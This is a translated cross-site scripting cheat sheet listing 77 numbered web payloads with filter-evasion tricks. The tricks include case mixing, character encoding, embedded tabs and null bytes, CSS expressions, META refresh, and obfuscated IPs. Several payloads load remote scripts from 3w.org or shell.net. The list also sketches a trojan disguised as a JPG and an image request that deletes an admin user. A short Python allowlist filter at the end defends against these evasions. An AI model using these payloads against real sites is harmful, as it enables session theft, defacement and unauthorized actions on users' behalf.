Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the trojan, change the trojan to JPG image format, and when the image-format trojan is accessed our trojan is executed too!

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multiline embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null characters
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null characters 2; null characters are basically useless domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (consists of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript in Flash, you can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
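Added example, not part of the original post: a Python allowlist check for URL-carrying attributes (SRC, HREF, BACKGROUND, url() in CSS) that normalizes the obfuscations items 3 to 19 and 47 rely on, in the order a browser applies them (decode character references once, then drop the ignorable code points), before it looks at the scheme, so the filter judges the same string the browser executes. The function names and the scheme allowlist are assumptions of the example.

```python
import html
import re

# Code points a browser drops or ignores in an attribute URL before it reads
# the scheme: ASCII 0-32 (NUL, tab, LF, CR, space) plus the extras item 47
# lists (160, the 8192-8205 Unicode space block, 12288, 65279). Because only
# the scheme is judged, stripping them everywhere is a safe conservative choice.
IGNORED_CODEPOINTS = set(range(0, 33)) | {160, 12288, 65279} | set(range(8192, 8206))

# Schemes this hypothetical filter allows (an assumption for the example).
SAFE_SCHEMES = {"http", "https", "mailto"}
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def normalize_url(raw: str) -> str:
    """Return the URL the way the browser will read it: decode HTML character
    references once (browsers accept &#106 / &#x6A without the ';'), then strip
    every ignorable code point so 'jav<TAB>ascript', 'java<NUL>script' and
    ' javascript' all collapse to 'javascript'."""
    decoded = html.unescape(raw)
    return "".join(ch for ch in decoded if ord(ch) not in IGNORED_CODEPOINTS)


def url_is_safe(raw: str) -> bool:
    """Allowlist check on the normalized scheme. No explicit scheme means a
    relative URL and passes; an explicit scheme must be in SAFE_SCHEMES, so
    javascript:, vbscript: and data: are rejected however they are spelled.
    Host tricks (protocol-relative '//', decimal/hex/octal IPs, trailing dot)
    are an open-redirect concern and are deliberately not judged here."""
    match = SCHEME_RE.match(normalize_url(raw))
    if match is None:
        return True
    return match.group(1).lower() in SAFE_SCHEMES


if __name__ == "__main__":
    # Constructed samples mirroring items 4, 11, 5 and 38 of the list above.
    samples = [
        "JaVaScRiPt:alert('XSS')",
        "jav\tascript:alert('XSS');",
        "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
        "http://3w.org/xss.css",
    ]
    for sample in samples:
        print(f"{'allow' if url_is_safe(sample) else 'block'}  {sample!r}")
```

Double-encoded references such as &amp;#106; stay literal after the single decode, which is also what the browser sees, so they are not a bypass of this check.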